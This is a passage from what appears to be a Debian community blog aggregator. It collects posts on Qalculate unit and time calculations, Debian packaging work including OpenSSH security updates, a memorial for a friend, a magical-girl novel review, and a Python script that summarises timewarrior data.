builtin. It is possible to call time(1)
with command time
, but
it's not possible to replace the command
keyword so that means a lot
of typing.
Again: you can't use \
to bypass aliases. This is a huge annoyance
for me. I would need to learn to type command
in long form, and I
use that stuff pretty regularly. I guess I could alias command
to
c
or something, but this is one of those huge muscle memory challenges.
Alt-. doesn't always work the way I expect.
[I’d like to stop writing posts like this. I’ve been trying to work out what to say now for nearly 2 months (writing the mail to -private
to tell the Debian project about his death is one of the hardest things I’ve had to write, and I bottled out and wrote something that was mostly just factual, because it wasn’t the place), and I’ve decided I just have to accept this won’t be the post I want it to be, but posted is better than languishing in drafts.]
Last weekend I was in Portland, for the Celebration of Life of my friend Steve, who sadly passed away at the start of the year. It wasn’t entirely unexpected, but that doesn’t make it any easier.
I’ve struggled to work out what to say about Steve. I’ve seen many touching comments from others in Debian about their work with him, but what that’s mostly brought home to me is that while I met Steve through Debian, he was first and foremost my friend rather than someone I worked with in Debian. And so everything I have to say is more about that friendship (and thus feels a bit self-centred).
My first memory of Steve is getting lost with him in Porto Alegre, Brazil, during DebConf4. We’d decided to walk to a local mall to meet up with some other folk (I can’t recall how they were getting there, but it wasn’t walking), ended up deep in conversation (ISTR it was about shared library transitions), and then it took a bit longer than we expected. I don’t know how that managed to cement a friendship (neither of us saw it as the near death experience others feared we’d had), but it did.
Unlike others I never texted Steve much; we’d occasionally chat on IRC, but nothing major. That didn’t seem to matter when we actually saw each other in person though, we just picked up like we’d seen each other the previous week. DebConf became a recurring theme of when we’d see each other. Even outside DebConf we went places together. The first time I went somewhere in the US that wasn’t the Bay Area, it was to Portland to see Steve. He, and his family, came to visit me in Belfast a couple of times, and I did a road trip from Dublin to Cork with him. He took me to a volcano.
Steve saw injustice in the world and actually tried to do something about it. I still have a copy of the US constitution sitting on my desk that he gave me. He made me want to be a better person.
The world is a worse place without him in it, and while I am better for having known him, I am sadder for the fact he’s gone.
Most of my Debian contributions this month were sponsored by Freexian.
You can also support my work directly via Liberapay.
OpenSSH upstream released 9.9p2 with fixes for CVE-2025-26465 and CVE-2025-26466. I got a heads-up on this in advance from the Debian security team, and prepared updates for all of testing/unstable, bookworm (Debian 12), bullseye (Debian 11), buster (Debian 10, LTS), and stretch (Debian 9, ELTS). jessie (Debian 8) is also still in ELTS for a few more months, but wasn’t affected by either vulnerability.
Although I’m not particularly active in the Perl team, I fixed a libnet-ssleay-perl build failure because it was blocking openssl from migrating to testing, which in turn was blocking the above openssh fixes.
I also sent a minor sshd -T
fix upstream, simplified
a number of autopkgtests using the newish Restrictions:
needs-sudo
facility, and prepared for
removing the obsolete slogin
symlink.
I upgraded to the new upstream version 0.83.
I fixed build failures with GCC 15 in a few packages:
A lot of my Python team work is driven by its maintainer
dashboard.
Now that we’ve finished the transition to Python 3.13 as the default
version, and inspired by a recent debian-devel thread started by
Santiago, I
thought it might be worth spending a bit of time on the “uscan error”
section. uscan
is typically
scraping upstream web sites to figure out whether new versions are
available, and so it’s easy for its configuration to become outdated or
broken. Most of this work is pretty boring, but it can often reveal
situations where we didn’t even realize that a Debian package was out of
date. I fixed these packages:
I upgraded these packages to new upstream versions:
In bookworm-backports, I updated python-django to 3:4.2.18-1 (issuing BSA-121) and added new backports of python-django-dynamic-fixture and python-django-pgtrigger, all of which are dependencies of debusine.
I went through all the build failures related to python-click 8.2.0 (which was confusingly tagged but not fully released upstream) and posted an analysis.
I fixed or helped to fix various other build/test failures:
I dropped support for the old setup.py ftest
command from
zope.testrunner upstream.
I fixed various odds and ends of bugs:
setuptools_scm to setuptools-scm
Following up on last month, I merged and
uploaded Helmut’s /usr
-move
fix.
02 March, 2025 01:49PM by Colin Watson
01 March, 2025 10:01PM by Junichi Uekawa
Another short status update of what happened on my side last month. One larger block was the Phosh 0.45 release; reviews also took a considerable amount of time. On the fun side, debugging bananui and coming up with a fix in phoc, as well as setting up a small GSM network using osmocom to test more Cell Broadcast thingies, were likely the most fun parts.
- wlr_damage_ring_rotate_buffer (MR). Another prep for 0.19.x.
- wp-alpha-modifier-v1 protocol (MR)
- mk-gitlab-rel and improve it for alpha, beta, RCs (MR)
- ~ (MR)
- xdg-occlusion (now xdg-cutouts) protocol (MR)
- python3 as interpreter as well (MR)

This is not code by me but reviews of other people's code. The list is slightly incomplete. Thanks for the contributions!

- get_geometry_default (MR)

If you want to support my work see donations.
Join the Fediverse thread
I wanted to follow new content posted to Printables.com with a feed reader, but Printables.com doesn't provide one. Neither do the other obvious 3d model catalogues. So, I started building one.
I have something that spits out an Atom feed and a couple of beta testers gave me some valuable feedback. I had planned to make it public, with the ultimate goal being to convince Printables.com to implement feeds themselves.
Meanwhile, I stumbled across someone else who has done basically the same thing. Here are 3rd party feeds for
The format of their feeds is JSON Feed, which is new to me. FreshRSS and NetNewsWire seem happy with it. (I went with Atom.) I may still release my take, if I find time to make one improvement that my beta-testers suggested.
So there are only 2 web browser engines, and it seems likely there will soon only be 1, and making a whole new web browser from the ground up is effectively impossible because the browser vendors have weaponized web standards complexity against any newcomers. Maybe eventually someone will succeed and there will be 2 again. Best case. What a situation.
So throw out all the web standards. Make a browser that just runs WASM blobs, and gives them a surface to use, sorta like Wayland does. It has tabs, and a throbber, and urls, but no HTML, no javascript, no CSS. Just HTTP of WASM blobs.
This is where the web browser is going eventually anyway, except in the current line of evolution it will be WASM with all the web standards complexity baked in and reinforcing the current situation.
Would this be a mass of proprietary software? Have you looked at any corporate website's "source" lately? But what's important is that this would make it easy enough to build new browsers that they would stop being a point of control.
Want a browser that natively supports RSS? Poll the feeds, make a UI, download the WASM enclosures to view the posts. Want a browser that supports IPFS or gopher? Fork any browser and add it, the maintenance load will be minimal. Want to provide access to GPIO pins or something? Add an extension that can be accessed via the WASI component model. This would allow for so many things like that which won't and can't happen with the current market duopoly browser situation.
And as for your WASM web pages, well you can still use HTML if you like. Use the WASI component model to pull in an HTML engine. It doesn't need to support everything, just the parts of web standards that you want to use. Or you can do something entirely different in your WASM that is not HTML based at all but a better paradigm (oh hi Spritely or display postscript or gemini capsules or whatever).
Dual innovation sources or duopoly? I know which I'd prefer. This is not my project to build though.
This is going to be a controversial statement because some people are absolute nerds about this, but, I need to say it.
Qalculate is the best calculator that has ever been made.
I am not going to try to convince you of this, I just wanted to put out my bias out there before writing down those notes. I am a total fan.
This page will collect my notes of cool hacks I do with
Qalculate. Most examples are copy-pasted from the command-line
interface (qalc(1)
), but I typically use the graphical interface as
it's slightly better at displaying complex formulas. Discoverability
is obviously also better for the cornucopia of features this fantastic
application ships.
On Debian, Qalculate's CLI interface can be installed with:
apt install qalc
Then you start it with the qalc
command, and end up on a prompt:
anarcat@angela:~$ qalc
>
Then it's a normal calculator:
anarcat@angela:~$ qalc
> 1+1
1 + 1 = 2
> 1/7
1 / 7 ≈ 0.1429
> pi
pi ≈ 3.142
>
There's a bunch of variables to control display, approximation, and so on:
> set precision 6
> 1/7
1 / 7 ≈ 0.142857
> set precision 20
> pi
pi ≈ 3.1415926535897932385
When I need more, I typically browse around the menus. One big issue I
have with Qalculate is there are a lot of menus and features. I had
to fiddle quite a bit to figure out that set precision
command
above. I might add more examples here as I find them.
I often use the data units to estimate bandwidths. For example, here's what 1 megabit per second is over a month ("about 300 GiB"):
> 1 megabit/s * 30 day to gibibyte
(1 megabit/second) × (30 days) ≈ 301.7 GiB
Or, "how long will it take to download X", in this case, 1GiB over a 100 mbps link:
> 1GiB/(100 megabit/s)
(1 gibibyte) / (100 megabits/second) ≈ 1 min + 25.90 s
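These conversions are easy to sanity-check outside Qalculate too; here's a small Python sketch doing the same arithmetic by hand (plain numbers, no unit library):

```python
# 1 megabit/s sustained for 30 days, expressed in GiB
bits = 1_000_000 * 30 * 24 * 3600   # total bits transferred
gib = bits / 8 / 2**30              # bits -> bytes -> GiB
print(round(gib, 1))                # → 301.7

# time to download 1 GiB over a 100 Mbit/s link
seconds = (2**30 * 8) / 100_000_000  # bits to send / bits per second
print(f"{int(seconds // 60)} min + {seconds % 60:.2f} s")  # → 1 min + 25.90 s
```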
To calculate how much entropy (in bits) a given password structure
has, you count the number of possibilities in each entry (say, [a-z]
is
26 possibilities, "one word in an 8k dictionary" is 8000), take the
base-2 logarithm, and multiply by the number of entries.
For example, an alphabetic 14-character password is:
> log2(26*2)*14
log₂(26 × 2) × 14 ≈ 79.81
... 80 bits of entropy. To get the equivalent in a Diceware password with an 8000-word dictionary, you would need:
> log2(8k)*x = 80
(log₂(8 × 1000) × x) = 80 ≈
x ≈ 6.170
... about 6 words, which gives you:
> log2(8k)*6
log₂(8 × 1000) × 6 ≈ 77.79
78 bits of entropy.
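The formula is a one-liner in any language; here's a hedged Python sketch of the same calculation (entropy_bits is my name for it, not anything standard):

```python
from math import log2

def entropy_bits(possibilities: int, entries: int) -> float:
    """Bits of entropy for `entries` independent draws from a pool
    of `possibilities` symbols or words."""
    return log2(possibilities) * entries

print(round(entropy_bits(26 * 2, 14), 2))  # mixed-case alphabetic, 14 chars → 79.81
print(round(entropy_bits(8000, 6), 2))     # 6 Diceware words, 8k dictionary → 77.79
```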
You can convert between currencies!
> 1 EUR to USD
1 EUR ≈ 1.038 USD
Even fake ones!
> 1 BTC to USD
1 BTC ≈ 96712 USD
This relies on a database pulled from the internet (typically the European Central Bank rates, see the source). It will prompt you if it's too old:
It has been 256 days since the exchange rates last were updated.
Do you wish to update the exchange rates now? y
As a reader pointed out, you can set the refresh rate for currencies, as some currencies need much more frequent exchange-rate updates.
The graphical version has a little graphical indicator that, when you mouse over, tells you where the rate comes from.
Here are other neat conversions extracted from my history:
> teaspoon to ml
teaspoon = 5 mL
> tablespoon to ml
tablespoon = 15 mL
> 1 cup to ml
1 cup ≈ 236.6 mL
> 6 L/100km to mpg
(6 liters) / (100 kilometers) ≈ 39.20 mpg
> 100 kph to mph
100 kph ≈ 62.14 mph
> (108km - 72km) / 110km/h
((108 kilometers) − (72 kilometers)) / (110 kilometers/hour) ≈
19 min + 38.18 s
This is a more involved example I often do.
Say you have started a long running copy job and you don't have the
luxury of having a pipe you can insert pv(1) into to get a nice
progress bar. For example, rsync
or cp -R
can have that problem
(but not tar
!).
(Yes, you can use --info=progress2
in rsync
, but that estimate is
incremental and therefore inaccurate unless you disable the
incremental mode with --no-inc-recursive
, but then you pay a huge
up-front wait cost while the entire directory gets crawled.)
First step is to gather data. Find the process start time. If you were
unfortunate enough to forget to run date --iso-8601=seconds
before
starting, you can get a similar timestamp with stat(1)
on the
process tree in /proc
with:
$ stat /proc/11232
File: /proc/11232
Size: 0 Blocks: 0 IO Block: 1024 directory
Device: 0,21 Inode: 57021 Links: 9
Access: (0555/dr-xr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2025-02-07 15:50:25.287220819 -0500
Modify: 2025-02-07 15:50:25.287220819 -0500
Change: 2025-02-07 15:50:25.287220819 -0500
Birth: -
So our start time is 2025-02-07 15:50:25
; we shave off the
nanoseconds there, as they're below our precision noise floor.
If you're not dealing with an actual UNIX process, you need to figure out a start time: this can be a SQL query, a network request, whatever, exercise for the reader.
This is optional, but for the sake of demonstration, let's save this as a variable:
> start="2025-02-07 15:50:25"
save("2025-02-07T15:50:25"; start; Temporary; ; 1) =
"2025-02-07T15:50:25"
Next, estimate your data size. That will vary wildly with the job
you're running: this can be anything: number of files, documents being
processed, rows to be destroyed in a database, whatever. In this case,
rsync
tells me how many bytes it has transferred so far:
# rsync -ASHaXx --info=progress2 /srv/ /srv-zfs/
2.968.252.503.968 94% 7,63MB/s 6:04:58 xfr#464440, ir-chk=1000/982266)
Strip off the weird dots in there, because they will confuse Qalculate, which will count this as:
2.968252503968 bytes ≈ 2.968 B
Or, essentially, three bytes. We actually transferred almost 3TB here:
2968252503968 bytes ≈ 2.968 TB
So let's use that. If you had the misfortune of making rsync silent,
but were lucky enough to transfer entire partitions, you can use df
(without -h
! we want to be more precise here), in my case:
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/vg_hdd-srv 7512681384 7258298036 179205040 98% /srv
tank/srv 7667173248 2870444032 4796729216 38% /srv-zfs
(Otherwise, of course, you use du -sh $DIRECTORY
.)
Those are 1K blocks, which are actually (and rather unfortunately)
KiB
, or "kibibytes" (1024 bytes), not "kilobytes" (1000 bytes). Ugh.
> 2870444032 KiB
2870444032 kibibytes ≈ 2.939 TB
> 2870444032 kB
2870444032 kilobytes ≈ 2.870 TB
At this scale, those details matter quite a bit, we're talking about a 69GB (64GiB) difference here:
> 2870444032 KiB - 2870444032 kB
(2870444032 kibibytes) − (2870444032 kilobytes) ≈ 68.89 GB
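That gap is just the 24 extra bytes per block (1024 vs 1000), applied to ~2.9 billion blocks; a quick sanity check in plain Python (not Qalculate):

```python
blocks = 2870444032                  # 1K (KiB) blocks reported by df
diff_bytes = blocks * (1024 - 1000)  # 24 bytes of difference per block
print(round(diff_bytes / 1e9, 2))    # → 68.89 (GB)
```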
Anyways. Let's take 2968252503968 bytes
as our current progress.
Our entire dataset is 7258298064 KiB
, as seen above.
We have 3 out of four variables for our equation here, so we can already solve:
> (now-start)/x = (2996538438607 bytes)/(7258298064 KiB) to h
((actual − start) / x) = ((2996538438607 bytes) / (7258298064
kibibytes))
x ≈ 59.24 h
The entire transfer will take about 60 hours to complete! Note that's not the time left, that is the total time.
To break this down step by step, we could calculate how long it has taken so far:
> now-start
now − start ≈ 23 h + 53 min + 6.762 s
> now-start to s
now − start ≈ 85987 s
... and do the cross-multiplication manually, it's basically:
x/(now-start) = (total/current)
so:
x = (total/current) * (now-start)
or, in Qalc:
> ((7258298064 kibibytes) / ( 2996538438607 bytes) ) * 85987 s
((7258298064 kibibytes) / (2996538438607 bytes)) × (85987 seconds) ≈
2 d + 11 h + 14 min + 38.81 s
It's interesting it gives us different units here! Not sure why.
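For the record, the same cross-multiplication in plain Python (numbers taken from the transfer above; a sanity check, not a replacement for Qalculate's unit handling):

```python
current_bytes = 2996538438607        # transferred so far (from rsync)
total_bytes = 7258298064 * 1024      # df reports 1K (KiB) blocks
elapsed_s = 85987                    # now - start, in seconds

# cross-multiplication: x = (total/current) * elapsed
total_s = (total_bytes / current_bytes) * elapsed_s
d, rem = divmod(total_s, 86400)
h, rem = divmod(rem, 3600)
m, s = divmod(rem, 60)
print(f"{int(d)} d + {int(h)} h + {int(m)} min + {s:.2f} s")
# → 2 d + 11 h + 14 min + 38.81 s
```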
The now
here is actually a built-in variable:
> now
now ≈ "2025-02-08T22:25:25"
There is a bewildering list of such variables, for example:
> uptime
uptime = 5 d + 6 h + 34 min + 12.11 s
> golden
golden ≈ 1.618
> exact
golden = (√(5) + 1) / 2
In any case, yay! We know the transfer is going to take roughly 60 hours total, and we've already spent around 24h of that, so, we have 36h left.
But I did that all in my head, we can ask more of Qalc yet!
Let's make another variable, for that total estimated time:
> total=(now-start)/x = (2996538438607 bytes)/(7258298064 KiB)
save(((now − start) / x) = ((2996538438607 bytes) / (7258298064
kibibytes)); total; Temporary; ; 1) ≈
2 d + 11 h + 14 min + 38.22 s
And we can plug that into another formula with our start time to figure out when we'll be done!
> start+total
start + total ≈ "2025-02-10T03:28:52"
> start+total-now
start + total − now ≈ 1 d + 11 h + 34 min + 48.52 s
> start+total-now to h
start + total − now ≈ 35 h + 34 min + 32.01 s
That transfer has ~1d left, or 35h34m32s, and should complete around 4 in the morning on February 10th.
But that's icing on top. I typically only do the cross-multiplication and calculate the remaining time in my head.
I mostly did the last bit to show Qalculate could compute dates and time differences, as long as you use ISO timestamps. Although it can also convert to and from UNIX timestamps, it cannot parse arbitrary date strings (yet?).
Qalculate can:
I have a hard time finding things it cannot do. When I get there, I typically resort to writing Python code or using a spreadsheet; others will turn to more complete engines like Maple, Mathematica or R.
But for daily use, Qalculate is just fantastic.
And it's pink! Use it!
This is just scratching the surface, the fine manual has more information, including more examples. There is also of course a qalc(1) manual page which also ships an excellent EXAMPLES section.
Qalculate is packaged for over 30 Linux distributions, but also ships packages for Windows and macOS. There are third-party derivatives as well, including a web version and an Android app.
Colin Watson liked this blog post and was inspired to write his own hacks, similar to what's here, but with extras, check it out!
FINMA closed the business of Parreaux, Thiébaud & Partners / Justicia SA in April 2023 but they did not publish their judgment at the same time.
On 6 September 2023 they announced the resignation of Urban Angehrn, director of FINMA since 1 November 2021.
Challenges that were successfully overcome under his leadership include, in particular, [ ... snip ... ], the supervision of supplementary health insurance geared towards client protection and the conclusion of complex enforcement proceedings.
On 19 September 2023 FINMA published the judgment against Parreaux, Thiébaud & Partners / Justicia SA. They suppressed the names and dates in the document.
Mr Angehrn departed on 30 September.
They wrote that Mr Angehrn had closed the business of Parreaux, Thiébaud & Partners / Justicia SA "successfully". But the clients received nothing.
He had shut down just one single scam in almost two years as director of FINMA.
Thanks to the financial accounts for 2023, we found the director's salary of CHF 602,000 and the termination payment of CHF 581,000.
“Being able to contribute to the sustainable improvement of the quality of the Swiss financial centre as CEO of FINMA was a unique challenge for me, and one that I tackled with all my might. However, the high and permanent stress level had health consequences. I have considered my decision carefully and have now decided to step down,” says Urban Angehrn.
He resigned due to stress and he received CHF 581,000 as a leaving gift. The clients received nothing.
apt-offline version 1.8.6 was released almost 3 weeks ago on 08/February/2025
This release includes many bug fixes from community users.
apt-offline (1.8.6-1) unstable; urgency=medium
* Error out if we cannot initialize the APT lock.
Thanks to Matthew Maslak
* check for checksum and handle appropriately (#217)
Thanks to Dan Whitman (Github:kyp44)
* Honor the --allow-unauthenticated option.
Thanks to João A (Github: Jonybat)
* Retry when server reports 429 Too Many Requests occurs.
Thanks to Zoltan Kelemen (Github: misterzed88)
* Also support file:/// url types.
Thanks to c4bhuf@github
* Honor user specified extra gpg keyrings
-- Ritesh Raj Sarraf <rrs@debian.org> Sat, 08 Feb 2025 20:46:24 +0530
26 February, 2025 01:26PM by Ritesh Raj Sarraf (rrs@researchut.com)
Review: A Little Vice, by Erin E. Elkin
Publisher: Erin Elkin
Copyright: June 2024
ASIN: B0CTHRK61X
Format: Kindle
Pages: 398
A Little Vice is a stand-alone self-published magical girl novel. It is the author's first novel.
C is a high school student and frequent near-victim of monster attacks. Due to the nefarious work of Avaritia Wolf and her allies, his high school is constantly attacked by Beasts, who are magical corruptions of some internal desire taken to absurd extremes. Standing in their way are the Angelic Saints: magical girls who transform into Saint Castitas, Saint Diligentia, and Saint Temperantia and fight the monsters. The monsters for some reason seem disposed to pick C as their victim for hostage-taking, mind control, use as a human shield, and other rather traumatic activities. He's always rescued by the Saints before any great harm is done, but in some ways this makes the situation worse.
It is obvious to C that the Saints are his three friends Inessa, Ida, and Temperance, even though no one else seems able to figure this out despite the blatant clues. Inessa has been his best friend since childhood when she was awkward and needed his support. Now, she and his other friends have become literal heroes, beautiful and powerful and capable, constantly protecting the school and innocent people, and C is little more than a helpless burden to be rescued. More than anything else, he wishes he could be an Angelic Saint like them, but of course the whole idea is impossible. Boys don't get to be magical girls.
(I'm using he/him pronouns for C in this review because C uses them for himself for most of the book.)
This is a difficult book to review because it is deeply focused on portraying a specific internal emotional battle in all of its sometimes-ugly complexity, and to some extent it prioritizes that portrayal over conventional story-telling. You have probably already guessed that this is a transgender coming-out story — Elkin's choice of the magical girl genre was done with deep understanding of its role in transgender narratives — but more than that, it is a transgender coming-out story of a very specific and closely-observed type. C knows who he wishes he was, but he is certain that this transformation is absolutely impossible. He is very deep in a cycle of self-loathing for wanting something so manifestly absurd and insulting to people who have the virtues that C does not.
A Little Vice is told in the first person from C's perspective, and most of this book is a relentless observation of C's anxiety and shame spiral and reflexive deflection of any possibility of a way out. This is very well-written: Elkin knows the reader is going to disagree with C's internalized disgust and hopelessness, knows the reader desperately wants C to break out of that mindset, and clearly signals in a myriad of adroit ways that Elkin is on the reader's side and does not agree with C's analysis. C's friends are sympathetic, good-hearted people, and while sometimes oblivious, it is obvious to the reader that they're also on the reader's side and would help C in a heartbeat if they saw an opening. But much of the point of the book is that it's not that easy, that breaking out of the internal anxiety spiral is nearly impossible, and that C is very good at rejecting help, both because he cannot imagine what form it could take but also because he is certain that he does not deserve it.
In other words, much of the reading experience of this book involves watching C torture and insult himself. It's all the more effective because it isn't gratuitous. C's internal monologue sounds exactly like how an anxiety spiral feels, complete with the sort of half-effective coping mechanisms, deflections, and emotional suppression one develops to blunt that type of emotional turmoil.
I normally hate this kind of book. I am a happy ending and competence porn reader by default. The world is full of enough pain that I don't turn to fiction to read about more pain. It says a lot about how well-constructed this book is that I stuck with it. Elkin is going somewhere with the story, C gets moments of joy and delight along the way to keep the reader from bogging down completely, and the best parts of the book feel like a prolonged musical crescendo with suspended chords. There is a climax coming, but Elkin is going to make you wait for it for far longer than you want to.
The main element that protects A Little Vice from being too grim is that it is a genre novel that is very playful about both magical girls and superhero tropes in general. I've already alluded to one of those elements: Elkin plays with the Mask Principle (the inability of people to see through entirely obvious secret identities) in knowing and entertaining ways. But there are also villains, and that leads me to the absolutely delightful Avaritia Wolf, who for me was the best character in this book.
The Angelic Saints are not the only possible approach to magical girl powers in this universe. There are villains who can perform a similar transformation, except they embrace a vice rather than a virtue. Avaritia Wolf embraces the vice of greed. They (Avaritia's pronouns change over the course of the book) also have a secret identity, which I suspect will be blindingly obvious to most readers but which I'll avoid mentioning since it's still arguably a spoiler.
The primary plot arc of this book is an attempt to recruit C to the side of the villains. The Beasts are drawn to him because he has magical potential, and the villains are less picky about gender. This initially involves some creepy and disturbing mind control, but it also brings C into contact with Avaritia and Avaritia's very specific understanding of greed. As far as Avaritia is concerned, greed means wanting whatever they want, for whatever reason they feel like wanting it, and there is absolutely no reason why that shouldn't include being greedy for their friends to be happy. Or doing whatever they can to make their friends happy, whether or not that looks like villainy.
Elkin does two things with this plot that I thought were remarkably skillful. The first is that she directly examines and then undermines the "easy" transgender magical girl ending. In a world of transformation magic, someone who wants to be a girl could simply turn into a girl and thus apparently resolve the conflict in a way that makes everyone happy. I think there is an important place for that story (I am a vigorous defender of escapist fantasy and happy endings), but that is not the story that Elkin is telling. I won't go into the details of why and how the story complicates and undermines this easy ending, but it's a lot of why this book feels both painful and honest to a specific, and very not easy, transgender experience, even though it takes place in an utterly unrealistic world.
But the second, which is more happy and joyful, is that Avaritia gleefully uses a wholehearted embrace of every implication of the vice of greed to bulldoze the binary morality of the story and question the classification of human emotions into virtues and vices. They are not a hero, or even all that good; they have some serious flaws and a very anarchic attitude towards society. But Avaritia provides the compelling, infectious thrill of the character who looks at the social construction of morality that is constraining the story and decides that it's all bullshit and refuses to comply. This is almost the exact opposite of C's default emotional position at the start of the book, and watching the two characters play off of each other in a complex friendship is an absolute delight.
The ending of this book is complicated, messy, and incomplete. It is the sort of ending that I think could be incredibly powerful if it hits precisely the right chords with the reader, but if you're not that reader, it can also be a little heartbreaking because Elkin refuses to provide an easy resolution. The ending also drops some threads that I wish Elkin hadn't dropped; there are some characters who I thought deserved a resolution that they don't get. But this is one of those books where the author knows exactly what story they're trying to tell and tells it whether or not that fits what the reader wants. Those books are often not easy reading, but I think there's something special about them.
This is not the novel for people who want detailed world-building that puts a solid explanation under events. I thought Elkin did a great job playing with the conventions of an episodic anime, including starting the book on Episode 12 to imply C's backstory with monster attacks and hinting at a parallel light anime story by providing TV-trailer-style plot summaries and teasers at the start and end of each chapter. There is a fascinating interplay between the story in which the Angelic Saints are the protagonists, which the reader can partly extrapolate, and the novel about C that one is actually reading. But the details of the world-building are kept at the anime plot level: There's an arch-villain, a World Tree, and a bit of backstory, but none of it makes that much sense or turns into a coherent set of rules. This is a psychological novel; the background and rules exist to support C's story.
If you do want that psychological novel... well, I'm not sure whether to recommend this book or not. I admire the construction of this book a great deal, but I don't think appealing to the broadest possible audience was the goal. C's anxiety spiral is very repetitive, because anxiety spirals are very repetitive, and you have to be willing to read for the grace notes on the doom loop if you're going to enjoy this book. The sentence-by-sentence writing quality is fine but nothing remarkable, and is a bit shy of the average traditionally-published novel. The main appeal of A Little Vice is in the deep and unflinching portrayal of a specific emotional journey. I think this book is going to work if you're sufficiently invested in that journey that you are willing to read the brutal and repetitive parts. If you're not, there's a chance you will bounce off this hard.
I was invested, and I'm glad I read this, but caveat emptor. You may want to try a sample first.
One final note: If you're deep in the book world, you may wonder, like I did, if the title is a reference to Hanya Yanagihara's (in)famous A Little Life. I do not know for certain — I have not read that book because I am not interested in being emotionally brutalized — but if it is, I don't think there is much similarity. Both books are to some extent about four friends, but I couldn't find any other obvious connections from some Wikipedia reading, and A Little Vice, despite C's emotional turmoil, seems to be considerably more upbeat.
Content notes: Emotionally abusive parent, some thoughts of self-harm, mind control, body dysmorphia, and a lot (a lot) of shame and self-loathing.
Rating: 7 out of 10
Sigh, sometimes I really don’t understand time. And I don’t mean in the physics sense.
It’s just, the days have way fewer hours than 10 years ago, or there’s way more stuff to do. Probably the latter 😅
No time for real open-source work, but I managed to do some minor coding, released a couple of minor versions (as upstream), and packaged some refreshes in Debian. The latter only because I got involved, against better judgement, in some too-heated discussions, but they ended well, somehow. Still, the whole episode motivated me to actually do some work, even if minor, rather than just rant on mailing lists 🙊.
My sports life is still pretty erratic, but despite some repeated sickness (my fault, for not sleeping well enough) and tendon issues, there are months in which I can put down 100km. And the skiing season was really awesome.
So life goes on, but I definitely am not keeping up with entropy, even in simple things such as my inbox. One day I’ll write a real blog post, not just an update, but in the meantime, it is what it is.
And yes, running 10km while still sick just because you’re bored is not the best idea. According to a friend, of course, not to my Strava account.
Anarcat recently wrote about Qalculate, and I think I’m a convert, even though I’ve only barely scratched the surface.
The thing I almost immediately started using it for is time calculations.
When I started tracking my time, I
quickly found that Timewarrior was good at
keeping all the data I needed, but I often found myself extracting bits of
it and reprocessing it in variously clumsy ways. For example, I often don’t
finish a task in one sitting; maybe I take breaks, or I switch back and
forth between a couple of different tasks. The raw output of timew
summary
is a bit clumsy for this, as it shows each chunk of time spent as
a separate row:
$ timew summary 2025-02-18 Debian

Wk Date       Day Tags                        Start      End     Time   Total
W8 2025-02-18 Tue CVE-2025-26465, Debian,     9:41:44 10:24:17 0:42:33
                    next, openssh
                  Debian, FTBFS with GCC-15, 10:24:17 10:27:12 0:02:55
                    icoutils
                  Debian, FTBFS with GCC-15, 11:50:05 11:57:25 0:07:20
                    kali
                  Debian, Upgrade to 0.67,   11:58:21 12:12:41 0:14:20
                    python_holidays
                  Debian, FTBFS with GCC-15, 12:14:15 12:33:19 0:19:04
                    vigor
                  Debian, FTBFS with GCC-15, 12:39:02 12:39:38 0:00:36
                    python_setproctitle
                  Debian, Upgrade to 1.3.4,  12:39:39 12:46:05 0:06:26
                    python_setproctitle
                  Debian, FTBFS with GCC-15, 12:48:28 12:49:42 0:01:14
                    python_setproctitle
                  Debian, Upgrade to 3.4.1,  12:52:07 13:02:27 0:10:20 1:44:48
                    python_charset_normalizer

                                                                       1:44:48
So I wrote this Python program to help me:
#! /usr/bin/python3

"""
Summarize timewarrior data, grouped and sorted by time spent.
"""

import json
import subprocess
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from operator import itemgetter

from rich import box, print
from rich.table import Table

parser = ArgumentParser(
    description=__doc__, formatter_class=RawDescriptionHelpFormatter
)
parser.add_argument("-t", "--only-total", default=False, action="store_true")
parser.add_argument(
    "range",
    nargs="?",
    default=":today",
    help="Time range (usually a hint, e.g. :lastweek)",
)
parser.add_argument("tag", nargs="*", help="Tags to filter by")
args = parser.parse_args()

entries: defaultdict[str, timedelta] = defaultdict(timedelta)
now = datetime.now(timezone.utc)
for entry in json.loads(
    subprocess.run(
        ["timew", "export", args.range, *args.tag],
        check=True,
        capture_output=True,
        text=True,
    ).stdout
):
    start = datetime.fromisoformat(entry["start"])
    if "end" in entry:
        end = datetime.fromisoformat(entry["end"])
    else:
        end = now
    entries[", ".join(entry["tags"])] += end - start

if not args.only_total:
    table = Table(box=box.SIMPLE, highlight=True)
    table.add_column("Tags")
    table.add_column("Time", justify="right")
    for tags, time in sorted(entries.items(), key=itemgetter(1), reverse=True):
        table.add_row(tags, str(time))
    print(table)

total = sum(entries.values(), start=timedelta())
hours, rest = divmod(total, timedelta(hours=1))
minutes, rest = divmod(rest, timedelta(minutes=1))
seconds = rest.seconds
print(f"Total time: {hours:02}:{minutes:02}:{seconds:02}")
$ summarize-time 2025-02-18 Debian

  Tags                                                     Time
 ──────────────────────────────────────────────────────────────
  CVE-2025-26465, Debian, next, openssh                 0:42:33
  Debian, FTBFS with GCC-15, vigor                      0:19:04
  Debian, Upgrade to 0.67, python_holidays              0:14:20
  Debian, Upgrade to 3.4.1, python_charset_normalizer   0:10:20
  Debian, FTBFS with GCC-15, kali                       0:07:20
  Debian, Upgrade to 1.3.4, python_setproctitle         0:06:26
  Debian, FTBFS with GCC-15, icoutils                   0:02:55
  Debian, FTBFS with GCC-15, python_setproctitle        0:01:50

Total time: 01:44:48
Much nicer. But that only helps with some of my reporting. At the end of a
month, I have to work out how much time to bill Freexian for and fill out a
timesheet, and for various reasons those queries don’t correspond to single
timew
tags: they sometimes correspond to the sum of all time spent on
multiple tags, or to the time spent on one tag minus the time spent on
another tag, or similar. As a result I quite often have to do basic
arithmetic on time intervals; but that’s surprisingly annoying! I didn’t
previously have good tools for that, and was reduced to doing things like
str(timedelta(hours=..., minutes=..., seconds=...) + ...)
in Python,
which gets old fast.
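Spelled out, the clumsy Python version looks something like this (`parse_hms` is a hypothetical helper I'm sketching here, not part of my tooling):

```python
from datetime import timedelta

def parse_hms(text: str) -> timedelta:
    # "62:46:30" -> timedelta(hours=62, minutes=46, seconds=30);
    # unlike datetime.time, hours may exceed 24 here.
    hours, minutes, seconds = (int(part) for part in text.split(":"))
    return timedelta(hours=hours, minutes=minutes, seconds=seconds)

print(parse_hms("62:46:30") - parse_hms("51:02:42"))  # 11:43:48
```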
Instead:
$ qalc '62:46:30 - 51:02:42 to time'

